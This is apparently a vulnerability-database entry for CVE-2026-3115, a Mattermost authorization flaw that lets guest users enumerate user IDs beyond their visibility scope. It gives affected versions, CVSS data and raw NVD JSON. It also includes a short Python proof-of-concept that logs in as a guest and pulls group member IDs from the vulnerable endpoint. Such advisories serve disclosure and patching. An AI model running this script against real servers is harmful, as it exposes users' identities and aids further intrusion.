Security Vulnerability Report
CVE-2026-3115 CVSS 4.3 MEDIUM

CVE-2026-3115

Published: 2026-03-26 17:16:43
Last Modified: 2026-03-30 19:40:02

Description

Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to apply view restrictions when retrieving group member IDs, which allows authenticated guest users to enumerate user IDs outside their allowed visibility scope via the group retrieval endpoint. Mattermost Advisory ID: MMSA-2026-00594

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (10.11.0 <= version < 10.11.11) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (11.2.0 <= version < 11.2.3) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (11.3.0 <= version < 11.3.2) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:11.4.0:*:*:*:*:*:*:* - VULNERABLE
Mattermost 11.2.x <= 11.2.2
Mattermost 10.11.x <= 10.11.10
Mattermost 11.4.x <= 11.4.0
Mattermost 11.3.x <= 11.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
TARGET_URL = "https://mattermost.example.com"
API_BASE = f"{TARGET_URL}/api/v4"

# Low-privileged Guest credentials
EMAIL = "[email protected]"
PASSWORD = "password123"


def login():
    """Authenticate and retrieve session token."""
    login_url = f"{API_BASE}/users/login"
    payload = {
        "login_id": EMAIL,
        "password": PASSWORD
    }
    try:
        response = requests.post(login_url, json=payload)
        if response.status_code == 200:
            # Mattermost returns the session token in the "Token" response header
            token = response.headers.get("Token")
            print(f"[+] Login successful. Token: {token}")
            return token
        else:
            print(f"[-] Login failed: {response.text}")
            return None
    except Exception as e:
        print(f"[-] Connection error: {e}")
        return None


def enumerate_user_ids(token, group_id):
    """Exploit the vulnerability to list group members."""
    headers = {"Authorization": f"Bearer {token}"}
    # Vulnerable endpoint: /api/v4/groups/{group_id}/members
    exploit_url = f"{API_BASE}/groups/{group_id}/members"
    print(f"[*] Attempting to enumerate members for Group ID: {group_id}")
    try:
        response = requests.get(exploit_url, headers=headers)
        if response.status_code == 200:
            members = response.json()
            print(f"[+] Success! Found {len(members)} members:")
            for member in members:
                print(f" - User ID: {member.get('user_id')}")
        else:
            print(f"[-] Request failed with status {response.status_code}: {response.text}")
    except Exception as e:
        print(f"[-] Error during exploitation: {e}")


if __name__ == "__main__":
    token = login()
    if token:
        # Replace with a valid or guessed Group ID
        target_group = "GROUP_ID_TO_TEST"
        enumerate_user_ids(token, target_group)

References

https://mattermost.com/security-updates (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-3115",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-26T17:16:42.660",
    "lastModified": "2026-03-30T19:40:01.770",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to apply view restrictions when retrieving group member IDs, which allows authenticated guest users to enumerate user IDs outside their allowed visibility scope via the group retrieval endpoint.. Mattermost Advisory ID: MMSA-2026-00594"
      },
      {
        "lang": "es",
        "value": "Las versiones de Mattermost 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 no aplican las restricciones de visualización al recuperar los IDs de miembros de grupo, lo que permite a los usuarios invitados autenticados enumerar los IDs de usuario fuera de su ámbito de visibilidad permitido a través del endpoint de recuperación de grupo. ID de Aviso de Mattermost: MMSA-2026-00594"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-863"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "10.11.0",
                "versionEndExcluding": "10.11.11",
                "matchCriteriaId": "B6E5F368-358C-429B-8F04-3C8DF4A71A91"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.2.0",
                "versionEndExcluding": "11.2.3",
                "matchCriteriaId": "7F64C167-943D-4F3F-9374-BCC8DECB3881"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.3.0",
                "versionEndExcluding": "11.3.2",
                "matchCriteriaId": "805ECFFC-82FD-4754-AF95-32167E1D41CB"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:11.4.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "7B6A1FE2-D980-4755-A838-190A53A4D62B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://mattermost.com/security-updates",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}